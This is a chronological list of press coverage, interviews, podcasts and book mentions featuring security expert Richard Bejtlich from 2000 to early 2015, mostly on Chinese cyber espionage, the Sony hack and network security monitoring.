- Mr. Bejtlich's 28 January 2015 testimony to the Senate Homeland Security and Government Affairs Committee on Protecting America from Cyber Attacks: The Importance of Information Sharing was covered by USA Today, FierceGovernmentIT, The Daily Cardinal, SecurityWeek, and FedScoop.
- Mr. Bejtlich was interviewed for the Daily Beast story Was Sony Hit With a Second Hack?, published 8 January 2015.
- Mr. Bejtlich was cited in the Dark Reading story Using Free Tools To Detect Attacks On ICS/SCADA Networks, published 8 January 2015.
- Mr. Bejtlich was cited in the Wired story Critics Say New Evidence Linking North Korea to the Sony Hack Is Still Flimsy, published 8 January 2015.
- 2014
- Mr. Bejtlich was interviewed for the Dark Reading story Sony Hacked By N. Korea, Hacktivists, Ex-Employee, Or All Of The Above?, published 30 December 2014.
- Mr. Bejtlich was cited in the Huffington Post story As North Korea Loses Internet, Anonymous, Others Question Whether It Really Hacked Sony, published 22 December 2014.
- Mr. Bejtlich was interviewed for the CBS News story Hacking After Sony: What Companies Need to Know, published 13 December 2014.
- Mr. Bejtlich was interviewed for the SearchSecurity story Security Strategy with Richard Bejtlich, published 6 December 2014.
- Mr. Bejtlich was interviewed for the Fox Business segment US Businesses Behind on Cyber Security (video), aired 2 December 2014.
- Mr. Bejtlich was cited in the Dark Reading story FBI Warning Shows Targeted Attacks Don't Just Steal Anymore, published 2 December 2014.
- Mr. Bejtlich was cited in an excerpt from Shane Harris' book, @War, as Google’s secret NSA alliance, published 16 November 2014.
- Mr. Bejtlich was interviewed for the Fedscoop story What does the White House network breach mean for cybersecurity reform?, published 3 November 2014.
- Mr. Bejtlich was mentioned by FCW as one of 4 cybersecurity gurus to follow on Twitter, published 1 October 2014.
- Mr. Bejtlich was introduced by Sqrrl as a company advisor in Sqrrl Bolsters Cybersecurity Capabilities with New Advisors, published 22 September 2014.
- Mr. Bejtlich was interviewed for the McClatchy news bureau story Chinese hacking into critical Pentagon contractors, published 17 September 2014.
- Mr. Bejtlich was interviewed for the Ars Technica story In case of cyber attack: NATO members ready to pledge mutual defense, published 4 September 2014.
- Mr. Bejtlich was interviewed for the CSO story The hacker 'skills gap' may be more of a strategy gap, published 3 September 2014.
- Mr. Bejtlich was interviewed for the ZDNet story Cybersecurity hiring crisis: Rockstars, anger and the billion dollar problem, published 26 August 2014.
- Mr. Bejtlich was cited in the NextGov story Exclusive: Nuke Regulator Hacked by Suspected Foreign Powers, published 18 August 2014.
- Mr. Bejtlich was interviewed for the Washington Post story Chinese cyberspies have hacked Middle East experts at major U.S. think tanks, published 7 July 2014.
- Mr. Bejtlich was cited in the Foreign Policy story Supreme Court Shields Cell Phone Data, published 25 June 2014.
- Mr. Bejtlich was interviewed for the Voice of America story US Cyberfirm: China Military Continues Hacking After US Indictment, published 10 June 2014.
- Mr. Bejtlich was interviewed for the CSO story Needed: Breach Detection, published 27 May 2014.
- Mr. Bejtlich was interviewed for the ABC This Week story Cyber Spying Alert, aired 25 May 2014.
- Mr. Bejtlich was interviewed for the Dark Reading story State-Owned Chinese Firms Hired Military Hackers for IT Services, published 21 May 2014.
- Mr. Bejtlich was interviewed for the Washington Business Journal story Will China retaliate over cyber-espionage charges?, published 21 May 2014.
- Mr. Bejtlich was interviewed for the NPR story Charges Of Chinese Cybercrimes To Play Out In American Courts, aired 19 May 2014.
- Mr. Bejtlich was interviewed for the Recode story What to Expect From Charges Against Chinese Hackers: Nothing, published 19 May 2014.
- Mr. Bejtlich was interviewed for the USA Today story China's theft of business secrets is beyond espionage, published 19 May 2014.
- Mr. Bejtlich was cited in the AP story US charges Chinese officials in cyberspying case, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Dark Reading story The New Normal: US Charges Chinese Military Officers With Cyber Espionage, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Christian Science Monitor story US indicts five in China's secret 'Unit 61398' for cyber-spying on US firms, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Hill story Holder hits China on cyber spying, published 19 May 2014.
- Mr. Bejtlich was interviewed on the Kojo Nnamdi Show segment The U.S. Criminal Hacking Case Against China, aired live 19 May 2014.
- Mr. Bejtlich was interviewed for the Daily Beast story #ShotsFired in U.S.-China Cyberwar, published 19 May 2014.
- Mr. Bejtlich was interviewed for the PCWorld story Chinese state-owned enterprises 'hired' military hacking unit, published 19 May 2014.
- Mr. Bejtlich was interviewed for the Foreign Policy story Caught Red-Handed, published 19 May 2014.
- Mr. Bejtlich was cited in the Register story Call of Duty 'fragged using OpenSSL's Heartbleed exploit', published 10 April 2014.
- Mr. Bejtlich was interviewed in the NPR story For China And U.S., An Attempt To Clarify Rules Of Cyberwarfare, aired 7 April 2014.
- Mr. Bejtlich was cited in the PBS story Opening Doors to Iran, U.S. Allows Academic Exchanges, aired 7 April 2014.
- Mr. Bejtlich was cited in the Bloomberg story SEC Probes Threat From Cyber Attacks Against Wall Street, published 25 March 2014.
- Mr. Bejtlich was cited in the Wall Street Journal story Cyberdefense Costs Mount, published 26 February 2014.
- Mr. Bejtlich was cited in the Christian Science Monitor story New US cybersecurity standards: Will they do enough?, published 12 February 2014.
- Mr. Bejtlich was interviewed for the WGBH story Security Experts: Colleges Targeted For Future Cyber Attacks, published 12 February 2014.
- Mr. Bejtlich was cited in the Politico story Cybersecurity in slow lane one year after Obama order, published 9 February 2014.
- Mr. Bejtlich was interviewed for the NPR story A Possible Explanation For How U.S. Diplomat's Call Was Tapped, published 8 February 2014.
- Mr. Bejtlich was cited in the Verge story LinkedIn kills its Intro email service after less than four months, published 7 February 2014.
- Mr. Bejtlich was cited in the Fast Company story We Will Create a Stronger Internet, published 14 January 2014.
- Mr. Bejtlich was mentioned in the Quartz story Will the NSA spying revelations hurt America’s nascent cyberforensics industry abroad?, published 3 January 2014.
- Mr. Bejtlich was mentioned in the Wall Street Journal story Mandiant Purchase Proves Worth of Cybersleuthing, published 2 January 2014.
- 2013
- Mr. Bejtlich was interviewed for the NextGov story The Ten Worst Hacks of 2013, published 30 December 2013.
- Mr. Bejtlich was cited in the Newsweek story How Edward Snowden Escalated Cyber War with China, published 1 November 2013.
- Mr. Bejtlich was cited in the TechTarget story Eliminating Black Hat Bargains, published 1 November 2013.
- Mr. Bejtlich was cited in the New York Times story LinkedIn’s New Mobile App Called ‘a Dream for Attackers', published 24 October 2013.
- Mr. Bejtlich was cited in the Mother Jones story CISPA Zombie Bill Is Back, With Fewer Privacy Concerns…Maybe?, published 21 October 2013.
- Mr. Bejtlich was cited in the National Defense Magazine story Shutdown, Policy Gridlock Deal Major Blows to Cybersecurity Efforts, published 9 October 2013.
- Mr. Bejtlich was cited in the Mother Jones story John McAfee Claims He Can Protect You From the NSA for $100, published 1 October 2013.
- Mr. Bejtlich was cited in the Washington Post story After Snowden revelations, China worries about cyberdefense, hackers, published 4 September 2013.
- Mr. Bejtlich was cited in the Dark Reading story Stuxnet Expert Proposes New Framework For ICS/SCADA Security, published 4 September 2013.
- Mr. Bejtlich was cited in the Foreign Affairs story DOD's Huge Plan to Stop the Next Snowden Is Going to Take A While, published 19 August 2013.
- Mr. Bejtlich was cited in the Mother Jones story Bad News: Hackers Are Coming for Your Tap Water, published 7 August 2013.
- Mr. Bejtlich was interviewed for the CBS News story How Chinese hackers steal U.S. secrets, published 7 August 2013.
- Mr. Bejtlich was interviewed by Secure Ninja TV, aired 3 August 2013.
- Mr. Bejtlich won the Economist debate on cyber war which concluded 2 August 2013.
- Mr. Bejtlich was interviewed by Bloomberg West, aired 12 July 2013.
- Mr. Bejtlich was cited in the SC Magazine story Chalk IT up: Boardroom communication, published 03 July 2013.
- Mr. Bejtlich was cited in the Washington Post story Robert J. Samuelson commentary: Internet could be more trouble than it's worth, published 01 July 2013.
- Mr. Bejtlich was cited in the Wall Street Journal story Current Account: Cyberattacks Are Banks Latest Existential Risk, published 24 June 2013.
- Mr. Bejtlich was interviewed at the Wall Street Journal's CFO Network annual conference, recorded by C-SPAN (video), on 18 June 2013.
- Mr. Bejtlich was cited in the Wall Street Journal story China's Cyber Stonewall, published 10 June 2013.
- Mr. Bejtlich was interviewed for the NPR story Cyberspying Expected To Be Discussed At U.S.-China Summit, aired 7 June 2013.
- Mr. Bejtlich was interviewed for the Washington Post story Chinese Hackers Stealing Almost Everything, aired 7 June 2013.
- Mr. Bejtlich was interviewed for the Bloomberg West story U.S., China Prepare to Discuss Cybersecurity, aired 6 June 2013.
- Mr. Bejtlich was interviewed for the To the Point story China, Cyber Espionage and Controlling the Internet, aired 4 June 2013.
- Mr. Bejtlich was interviewed for the Politico story President Obama likely to talk softly with China on cyber-snooping, published 2 June 2013.
- Mr. Bejtlich was interviewed for the Mother Jones story Why Iran's Hackers Might Be Scarier Than China's, published 30 May 2013.
- Mr. Bejtlich was cited in the CBS News story How Chinese hackers steal U.S. secrets, published 29 May 2013.
- Mr. Bejtlich was cited in the Daily Beast story Hackers Are Spying on You, published 29 May 2013.
- Mr. Bejtlich was interviewed for the Four Corners story Hacked, aired 27 May 2013.
- Mr. Bejtlich was cited in the Voice of America story China Resumes Cyber Attacks on US, Firm Says, published 20 May 2013.
- Mr. Bejtlich was interviewed for the Federal News Radio story Cybersecurity and Crowdfunding, aired 16 May 2013.
- Mr. Bejtlich was cited in the Bloomberg story Apple, Samsung Devices Seen Raising Pentagon’s Cyber Risk, published 15 May 2013.
- Mr. Bejtlich was cited in the NextGov story A Week After it was Mysteriously Disabled, U.S. Forces-Korea Website Returns, published 8 April 2013.
- Mr. Bejtlich was cited in the Forbes story A Different Approach To Foiling Hackers? Let Them In, Then Lie To Them, published 5 April 2013.
- Mr. Bejtlich was cited in the USA Today story Pentagon seeking 'rules of engagement' for cyber-war, published 4 April 2013.
- Mr. Bejtlich was cited in the Fast Company story Hacked? Mandiant's Cyberattack Detectives Want To Know All About It, published 3 April 2013.
- Mr. Bejtlich was cited in the Bloomberg story Security Fears Give Way to Economics as Cloud Computing Grows, published 27 March 2013.
- Mr. Bejtlich was cited in the Washington Examiner story NASA chief failed to tell Congress of 118 Chinese nationals working in IT, published 25 March 2013.
- Mr. Bejtlich was cited in the PCWorld story Security experts warn about Iran and North Korea hackers, published 24 March 2013.
- Mr. Bejtlich was cited in the ThreatPost story Experts Tell Congress Serious Deterrence Needed to Impede Foreign Cyber Attacks, published 21 March 2013.
- Mr. Bejtlich was cited in the Economic Times story China spends massively on cyber spying, US Congress told, published 20 March 2013.
- Mr. Bejtlich was interviewed for the CNBC story Cybersecurity Firm Says It Is Under Attack, published 20 March 2013.
- Mr. Bejtlich was cited in the Economist story Can You Keep a Secret?, published 16 March 2013.
- Mr. Bejtlich was cited in the Dark Reading story Medical Industry Under Attack By Chinese Hackers, published 14 March 2013.
- Mr. Bejtlich was cited in the LA Times story China hacker's angst opens a window onto cyber-espionage, published 12 March 2013.
- Mr. Bejtlich was cited in the CNN story Watch where you click: International cyber attacks on the rise, published 12 March 2013.
- Mr. Bejtlich was interviewed by Soledad O'Brien for CNN, with video, aired 11 March 2013.
- Mr. Bejtlich was cited in the Nation story , published 4 March 2013.
- Mr. Bejtlich was interviewed for the Computerworld story Mandiant's Richard Bejtlich on China, IP and the new cyber war, published 27 February 2013.
- Mr. Bejtlich was cited in the SC Magazine story RSA 2013: Hackers will get in, so spend the money on pushing them out, published 27 February 2013.
- Mr. Bejtlich was interviewed on the Kojo Nnamdi show for the segment titled Tracking Chinese Hackers, aired 26 February 2013.
- Mr. Bejtlich was interviewed for the IT Web story Formulating an attack-focused security plan, published 26 February 2013.
- Mr. Bejtlich was cited in the Asian Correspondent story Analysis: Detailed China hacking report leaves little room for doubt, published 25 February 2013.
- Mr. Bejtlich was cited in the Economist story Cybercrime: Smoking Gun, published 23 February 2013.
- Mr. Bejtlich was cited in the Reuters story Mandiant goes viral after China hacking report, published 23 February 2013.
- Mr. Bejtlich was interviewed for the Forbes article The Shanghai Army Unit That Hacked 115 U.S. Targets Likely Wasn't Even China's 'A-Team', published 21 February 2013.
- Mr. Bejtlich was interviewed for the Nightly Business Report TV show, with transcript and video, aired 21 February 2013.
- Mr. Bejtlich was cited in the China Daily story US hacking into China a common problem, published 21 February 2013.
- Mr. Bejtlich was cited in the China Daily story 'Cyberattacks using US IPs' target military, published 21 February 2013.
- Mr. Bejtlich was interviewed for the Mother Jones story Chinese Cyberwarfare, Explained, published 21 February 2013.
- Mr. Bejtlich was cited in the CSO Online story Mandiant Gains Instant Fame After Chinese Hack Report, published 21 February 2013.
- Mr. Bejtlich was cited in the Dark Reading story Attribution Delivers Questionable Security Value, published 20 February 2013.
- Mr. Bejtlich was cited in the Scotsman story Chinese military unit behind hacking attacks, published 20 February 2013.
- Mr. Bejtlich was interviewed for the NPR story How Could The U.S. Respond To Chinese Hacking?, published 20 February 2013.
- Mr. Bejtlich was interviewed for the Digital Trends story China is waging an undeclared cyberwar on the US - but now what?, published 20 February 2013.
- Mr. Bejtlich was cited in the Voice of America story Chinese Army Rejects US Report on Cyber Hacking, published 20 February 2013.
- Mr. Bejtlich was cited in the Washington Post story Report ties cyberattacks on U.S. computers to Chinese military, published 19 February 2013.
- Mr. Bejtlich was interviewed for the Voice of America video story US Firm Links Chinese Army to Cyber Attacks, aired 19 February 2013.
- Mr. Bejtlich was interviewed on the PBS Newshour TV show, with video and transcript, aired 19 February 2013.
- Mr. Bejtlich was cited in the Associated Press story US ready to strike back against China cyberattacks, published 19 February 2013.
- Mr. Bejtlich was cited in the eWeek story Chinese Military Group Identified in Attacks on U.S. Networks: Mandiant, published 19 February 2013.
- Mr. Bejtlich was cited in the Dark Reading story Chinese Military Tied To Major Cyberespionage Operation, published 19 February 2013.
- Mr. Bejtlich was interviewed for the print and TV Sky News HD story Chinese Military's 'Global Hacking HQ Found', published and aired 19 February 2013.
- Mr. Bejtlich was cited in the American Banker story Banks Eyeing China Vulnerable to Army Cyberattack: Report, published 19 February 2013.
- Mr. Bejtlich was cited in the LA Times story Computer security firm blames cyber spying on Chinese military, published 19 February 2013.
- Mr. Bejtlich was interviewed for the Fiscal Times story Chinese Attacks Reveal an Undeclared Global Cyber War, published 19 February 2013.
- Mr. Bejtlich was cited in the Fiscal Times story Pentagon Readies a Cyber Arsenal to Fight Attackers, published 18 February 2013.
- Mr. Bejtlich was cited in the IT Pro Portal story Defence industry looks to cash in on soaring cyber-spend, published 18 February 2013.
- Mr. Bejtlich was cited in the NPR story Victims Of Cyberattacks Get Proactive Against Intruders, published 13 February 2013.
- Mr. Bejtlich was cited in the NPR story In Cyberwar, Software Flaws Are A Hot Commodity, published 12 February 2013.
- Mr. Bejtlich was a guest on the Diane Rehm Show on 12 February 2013.
- Mr. Bejtlich was cited in the Foreign Policy story What cyber security execs want to see from the government, published 11 February 2013.
- Mr. Bejtlich was cited in the Entrepreneur Magazine story Is Your Business Ready for Cyber War?, published 11 February 2013.
- Mr. Bejtlich was cited in the Washington Post story Secret Service investigating hack of Bush family e-mails, published 8 February 2013.
- Mr. Bejtlich was cited in the Bloomberg story Mandiant, the Go-To Security Firm for Cyber-Espionage Attacks, published 7 February 2013.
- Mr. Bejtlich was cited in the Defense News story DoD Faces Cyber Expert Talent Shortage, published 6 February 2013.
- Mr. Bejtlich was cited in the FCW story DOE data breach came after warnings, published 5 February 2013.
- Mr. Bejtlich was cited in the Economist story War on terabytes, published 2 February 2013.
- Mr. Bejtlich was interviewed by Australia's ABC PM radio program for their story China-based hackers attack NYT computer system, aired 1 February 2013. Audio available (.mp3)
- Mr. Bejtlich was cited in the AP story US weighs tougher action over China cyberattacks, published 1 February 2013.
- Mr. Bejtlich was cited in the Daily Beast story Is New York Times Hacking Just the Beginning?, published 1 February 2013.
- Mr. Bejtlich was cited in the CRN story Forensic Investigators Track Times Attack Step By Step, published 1 February 2013.
- Mr. Bejtlich was cited in the Krebs on Security story Source: Washington Post Also Broadly Infiltrated By Chinese Hackers in 2012, published 1 February 2013.
- Mr. Bejtlich was cited in the Wall Street Journal story Chinese Hackers Hit U.S. Media, published 31 January 2013.
- Mr. Bejtlich was interviewed for the NPR story 'New York Times' The Target Of Chinese Cyber Attack, published and aired 31 January 2013. Audio available (.mp3)
- Mr. Bejtlich was cited in the New York Times story Hackers in China Attacked The Times for Last 4 Months, published 30 January 2013.
- Mr. Bejtlich was cited in the FCW story Cybersecurity: Rejoining the battle on Capitol Hill, published 17 January 2013.
- Mr. Bejtlich was cited in the Bloomberg story A National Digital ID, Courtesy of the U.S. Postal Service?, published 11 January 2013.
- Mr. Bejtlich was cited in the Dark Reading story You Keep Using That Word, published 4 January 2013.
- Mr. Bejtlich was cited in the World Affairs article First Strike: US Cyber Warriors Seize the Offensive, published 4 January 2013.
- 2012
- Mr. Bejtlich was cited in the Register story US: We'll drag cyber-spies into COURT from their hideouts, published 20 December 2012.
- Mr. Bejtlich was cited in the Mother Jones story Defense Contractors Don't Want to Say When They've Been Hacked, published 13 December 2012.
- Mr. Bejtlich was cited in the SearchSecurity story Many in industry at odds over pending cybersecurity executive order, published 3 December 2012.
- Mr. Bejtlich was cited in The Week story Obama's war on hackers: 5 things you need to know, published 27 November 2012.
- Mr. Bejtlich was cited in the Global Security Newswire story DOE Facilities Still Have Cyber Weak Spots: IG, published 19 November 2012.
- Mr. Bejtlich was cited in the Foreign Policy story Dozens of cyber vulnerabilities found at Department of Energy facilities, published 16 November 2012.
- Mr. Bejtlich was cited in the Mother Jones story Is Obama About to Take Over the Internet?, published 16 November 2012.
- Mr. Bejtlich was cited in the Defense News story New Cyber Group Aims To Spread Basic Security, published 14 November 2012.
- Mr. Bejtlich was cited in the ComputerWorld story On the Internet, no one knows you're an authoritarian government, published 8 November 2012.
- Mr. Bejtlich was cited in the Foreign Policy story The new cyber vulnerability: Your law firm, published 7 November 2012.
- Mr. Bejtlich was cited in the Foreign Policy story Cyber Threat of the Week, published 6 November 2012.
- Mr. Bejtlich was cited in the SC story Monster Breach Hits SC Taxpayers, published 26 October 2012.
- Mr. Bejtlich was cited in the Slate story Republicans Warn Obama: Cybersecurity Executive Order Will Practically Destroy the Internet, published 15 October 2012.
- Mr. Bejtlich was cited in the Navy Times story Panetta outlines new cyber doctrine for DoD, published 13 October 2012.
- Mr. Bejtlich was cited in the Slashdot story U.S. Defense Secretary Warns of a Possible 'Cyber-Pearl Harbor', published 13 October 2012.
- Mr. Bejtlich was cited in the AP story US warning reflects fears of Iranian cyberattack, published 12 October 2012.
- Mr. Bejtlich was cited in the PC Advisory story Huawei: Separating Fact from Fiction, published 10 October 2012.
- Mr. Bejtlich was cited in the Dark Reading story Congressional Intelligence Committee Warns Against Doing Business With Chinese Telecom Firms, published 8 October 2012.
- Mr. Bejtlich was cited in the Info Security story http://www.infosecurity-magazine.com/view/28481/the-ten-security-issues-guaranteed-to-cause-a-flamewar, published 27 September 2012.
- Mr. Bejtlich was cited in the CRN story The Paradox Of Apple Security: Does Secrecy Make You Safer?, published 21 September 2012.
- Mr. Bejtlich was cited in the Associated Press story Panetta talks computer hacking issues with Chinese, published 20 September 2012.
- Mr. Bejtlich was cited in the Dark Reading story The Data Annihilation Attack Is Back, published 12 September 2012.
- Mr. Bejtlich was cited in the Federal Computer Week story Federal data breaches: How long is too long to inform victims?, published 10 September 2012.
- Mr. Bejtlich was cited in the New York Review of Books story Are Hackers Heroes?, published 7 September 2012.
- Mr. Bejtlich was interviewed for the TV program This Week in Defense News with Vago Muradian, broadcast 1 September 2012.
- Mr. Bejtlich was cited in the Federal Computer Week story Is the government dropping the ball on cybersecurity?, published 23 August 2012.
- Mr. Bejtlich was interviewed in the HP story Transform Your Puny Weakling Tech Muscles into InfoSec BRAWN!, published 8 August 2012.
- Mr. Bejtlich was cited in the Defense News story Experts: Cloud Brings Vulnerabilities, published 30 July 2012.
- Mr. Bejtlich was cited in the SearchSecurity story Network threat detection moves beyond signatures, published 3 July 2012.
- Mr. Bejtlich was cited in the Dark Reading story The Enterprise Strikes Back, published 25 June 2012.
- Mr. Bejtlich was cited in the Dark Reading story The Intersection Between Cyberespionage And Cybercrime, published 21 June 2012.
- Mr. Bejtlich was cited in the Newsweek story The Stuxnet Leak Was a Valuable Warning Shot, published 18 June 2012.
- Mr. Bejtlich was cited in the DefenseNews story Building Better Red Teams, published 14 June 2012.
- Mr. Bejtlich was cited in the CRN story Apple To Make First Official Appearance At Black Hat Next Month, published 11 June 2012.
- Mr. Bejtlich was cited in the Dark Reading story Companies See Business In 'Doxing' The Adversary, published 31 May 2012.
- Mr. Bejtlich was cited in the Associated Press story Iran, other Mideast states hit by computer virus, published 29 May 2012.
- Mr. Bejtlich was cited in the Dark Reading story Selling a Secure Internet Domain, published May 17 2012.
- Mr. Bejtlich was interviewed for the NPR story Cybersecurity Firms Ditch Defense, Learn To 'Hunt', aired May 10 2012.
- Mr. Bejtlich was interviewed for the NPR story Cyber Briefings 'Scare The Bejeezus' Out Of CEOs, aired May 9 2012.
- Mr. Bejtlich was cited in the New York Times story Nissan Is Latest Company to Get Hacked, published 24 Apr 2012.
- Mr. Bejtlich was cited in the ThreatPost story E-Mail, Source Code From VMWare Bubbles Up From Compromised Chinese Firm, published 24 Apr 2012.
- Mr. Bejtlich was interviewed by BBC Radio 5 Live, aired 7 Apr 2012.
- Mr. Bejtlich was cited in the Government Computer News story Best defense? Start by admitting hackers will get in anyway, published 5 Apr 2012.
- Mr. Bejtlich was cited in the Dark Reading story Damage Mitigation As The New Defense, published 5 Apr 2012.
- Mr. Bejtlich was interviewed for the NPR story 'Anonymous' Hacking Group Threatens The Internet, aired 30 Mar 2012.
- Mr. Bejtlich was cited in the Wall Street Journal story US Outgunned in Hacker War, updated 28 Mar 2012.
- Mr. Bejtlich was cited in the Dark Reading story 'Anonymous' Legacy: Hacktivists Stole More Data Than Organized Crime In 2011 Breaches Worldwide, published 22 Mar 2012.
- Mr. Bejtlich was cited in the Wall Street Journal story Alert on Hacker Power Play, published 21 February 2012, and repeated within NSA chief fears Anonymous could hit power grid: report.
- Mr. Bejtlich was interviewed for the NPR story U.S. Not Afraid To Say It: China's The Cyber Bad Guy, aired 18 Feb 2012.
- Mr. Bejtlich was cited in the ThreatPost story Did A Decade-Long Hack Trigger Nortel's Demise?, published 15 Feb 2012.
- Mr. Bejtlich was cited in the Globe and Mail story Reported hacking of Nortel fuels concerns, skepticism, published 14 Feb 2012.
- Mr. Bejtlich was cited in the Dark Reading story Six-Year-Old Breach Comes Back To Haunt Symantec, published 26 Jan 2012.
- Mr. Bejtlich was cited in the Bloomberg story DuPont, Makhteshim, Kodak, News Corp: Intellectual Property, published 11 Jan 2012.
- Mr. Bejtlich was cited in the Bloomberg story SEC Push May Yield New Disclosures of Company Cyber Attacks, published 10 Jan 2012.
- Mr. Bejtlich was cited in the Popular Mechanics story Digital Spies: The Secret War, appearing in the Jan 2012 issue.
- 2011
- Mr. Bejtlich was cited in the Dark Reading story Dastardly Dozen: A Few APT Groups Carry Out Most Attacks, published 19 Dec 2011.
- Mr. Bejtlich was cited in the Bloomberg story China-Based Hacking of 760 Companies Shows Cyber Cold War, published 14 Dec 2011.
- Mr. Bejtlich was cited in the Dark Reading story APT Or Not APT? Discovering Who Is Attacking The Network, published 21 Nov 2011.
- Mr. Bejtlich was cited in the CSO Online story Experts advise caution, information sharing in wake of alleged utility attacks, published 21 Nov 2011.
- Mr. Bejtlich was cited in the SearchSecurity story Confusion over APT attacks leads to misguided security effort, published 15 Nov 2011.
- Mr. Bejtlich was interviewed for the SearchSecurity story Marcus Ranum chat: Information security monitoring, published 1 Nov 2011.
- Mr. Bejtlich was cited in the ComputerWorld story Hard to fully assess Duqu threat yet, researchers say, published 21 Oct 2011.
- Mr. Bejtlich was cited in the Canadian Business story Spies Like Them, published 20 Oct 2011.
- Mr. Bejtlich was interviewed for the Financial Times video report The expanding cyber industrial complex, published 11 Oct 2011.
- Mr. Bejtlich was cited in the DefenseNews story Ex-CIA Chief Calls for Less Cyber Secrecy, published 6 Oct 2011.
- Mr. Bejtlich was cited in the Dark Reading story A Call To Disarm Black Hat Hackers In China, published 21 Sep 2011.
- Mr. Bejtlich was cited in the Dark Reading story APT Attackers Hit Japan's Biggest Defense Contractor, published 19 Sep 2011.
- Mr. Bejtlich was cited in the New York Times story Hacker Rattles Security Circles, published 11 Sep 2011.
- Mr. Bejtlich was cited in the Network World story Peeling the Security Onion, published 10 September 2011.
- Mr. Bejtlich was cited in the Dark Reading story To Catch an APT, published 8 Sep 2011.
- Mr. Bejtlich was cited in the SC Magazine story Advanced persistent threats call for a reality check, published 7 Sep 2011.
- Mr. Bejtlich was cited in the SC Magazine story Breaking the next case, published 1 Sep 2011.
- Mr. Bejtlich was interviewed in the Dark Reading video MANDIANT CSO Talks Threats To His Company and His Clients, published 10 Aug 2011.
- Mr. Bejtlich was cited in the Dark Reading story APT Attackers Used Chinese-Authored Hacker Tool To Hide Their Tracks, published 3 Aug 2011.
- Mr. Bejtlich was cited in the Dark Reading story High-Profile Hacks Prompt High-Powered Hires, published 23 Jun 2011.
- Mr. Bejtlich was cited in the Dark Reading story Richard Bejtlich To Join MANDIANT As Chief Security Officer, Security Services Architect, published 17 Mar 2011.
- 2010
- Mr. Bejtlich was cited in the Reuters story Special report: The Pentagon's new cyber warriors, published 5 Oct 2010.
- Mr. Bejtlich was interviewed by Gary McGraw for the Silver Bullet Podcast, published 23 Aug 2010.
- Mr. Bejtlich was cited in the Wired magazine article Security Watch: Beware the NSA’s Geek-Spy Complex, published in Mar 2010.
- Mr. Bejtlich was interviewed for the PaulDotCom Podcast on 18 Mar 2010.
- 2009
- Mr. Bejtlich was interviewed for the Security Justice Podcast on 7 Nov 2009.
- Mr. Bejtlich interviewed colleague Ken Bradley for SANS on 2 Nov 2009.
- Mr. Bejtlich was cited in the Wired article Air Force Establishes ‘Reduced’ Cyber-War Command by David Axe on 18 Aug 2009.
- 2008
- Mr. Bejtlich was cited in the Economist article Marching Off to Cyberwar in the 4 Dec 2008 issue.
- Mr. Bejtlich was cited in the Wired article Estonia, Google Help 'Cyberlocked' Georgia by Noah Shachtman on 11 Aug 2008.
- Mr. Bejtlich was cited in the CSO article Cost-Cutting Through Green IT Security: Real or Myth? by Bill Brenner on 25 Jun 2008.
- Mr. Bejtlich featured as the cover story of the May 2008 issue of CSO Magazine with an article titled Incident Detection, Response, and Forensics.
- 2007
- Bill Brenner commented on Mr. Bejtlich's decision to become Director of Incident Response for General Electric in the article Richard Bejtlich: I'm Not Dead.
- Mr. Bejtlich was interviewed for the Sites Collide podcast.
- 2006
- Mr. Bejtlich was cited in the story Sourcefire IPO Could Fuel Snort, Users Say.
- Mr. Bejtlich was interviewed for the CyberSpeak Podcast.
- Mr. Bejtlich was interviewed for the Network Security Podcast.
- Mr. Bejtlich was interviewed for the Threat Chaos Podcast.
- Mr. Bejtlich was interviewed for the Run Your Own Server Podcast.
- The July 2006 issue of Information Security magazine features Mr. Bejtlich's first book, The Tao of Network Security Monitoring, as one of their Top Ten Books.
- Mr. Bejtlich was cited in the June 2006 issue of Information Security magazine, in the article Today's Attackers Can Find the Needle.
- Mr. Bejtlich was interviewed for the BSDTalk Podcast.
- Mr. Bejtlich was quoted by Processor.com.
- 2000-2005
- Mr. Bejtlich's comments on Renesys were reported in the Manchester Union Leader.
- Bookpool published Mr. Bejtlich's favorite 10 computer books of the past 10 years.
- Reuters reporter Andy Sullivan asked Mr. Bejtlich to comment for his 22 February 2005 story Paris Hilton Exposed on Web After Phone Hacked.
- Mr. Bejtlich was quoted by Shawna McAlearney of SearchSecurity.com in her 16 December 2004 article Nessus No Longer Free.
- Net Optics published a press release describing their products in the context of Mr. Bejtlich's books.
- The new Syngress book Security Sage's Guide to Hardening the Network Infrastructure mentions Mr. Bejtlich and the TaoSecurity Blog in relation to Snort.
- Dru Lavigne mentioned the TaoSecurity Blog in her article Interesting New Ports at the O'Reilly BSD Devcenter.
- Anton Chuvakin wrote this blog entry profiling TaoSecurity Blog.
- Mr. Bejtlich reviewed a draft of the Honey Project's book, Know Your Enemy: Revealing the Security Tools, Tactics, and Motives of the Blackhat Community. He is mentioned in the preface as a reviewer.
- Lance Spitzner was kind enough to mention Mr. Bejtlich in the preface to his latest book, Honeypots: Tracking Hackers.
- Stephen Northcutt and Judy Novak were kind enough to mention Mr. Bejtlich in the third edition of Network Intrusion Detection.
- Mr. Bejtlich reviewed two drafts of Hack I.T.: Security Through Penetration Testing, and he is mentioned in the acknowledgements.
- Two of Mr. Bejtlich's letters to the editor of Information Security magazine were published in the June 2002 issue. 'Name withheld upon request' is Mr. Bejtlich as well.
- Sandra Lowe-Sanchez interviewed Mr. Bejtlich and asked for his opinion of Turillion's web server protection product. Note his name is spelled "Bejtlick" in this 11 January 2002 article.
- Ed Tittel mentioned one of Mr. Bejtlich's Amazon.com reading lists in this article at TechTarget.com.
- Paul Innella wrote a history of intrusion detection systems that mentions the Automated Security Incident Measurement (ASIM) technology Mr. Bejtlich used in the Air Force.
- Deseret News, a Salt Lake City-based newspaper, interviewed Mr. Bejtlich on 24 August 2001 regarding security threats to Air Force networks. Incidentally, that day an Associated Press story reported a retired Air Force sergeant was accused of espionage after allegedly stealing classified data.
- NewsBytes, once a division of The Washington Post Company, interviewed Mr. Bejtlich after he posted a warning of the Code Red worm on 15 July 2001.
- A San Antonio Business Journal story from 29 June 2001 described Mr. Bejtlich's responsibilities at BATC, including network security monitoring and incident response.
- Congressman Lamar Smith visited BATC's network security operations center in June 2001. Mr. Bejtlich demonstrated how he might compromise his web server while coworker Bamm Visscher demonstrated how our network security monitoring service detects similar events. This story gives a few more details. Congressman Smith cited his visit to BATC while speaking on the House floor.
- The summer 2001 issue of 2600 magazine featured Mr. Bejtlich's photograph of a phone in Kusadasi, Turkey.
- On 29 May 2001 Mr. Bejtlich's work on interpreting network traffic was mentioned in an article by Duane Dunston at LinuxSecurity.com.
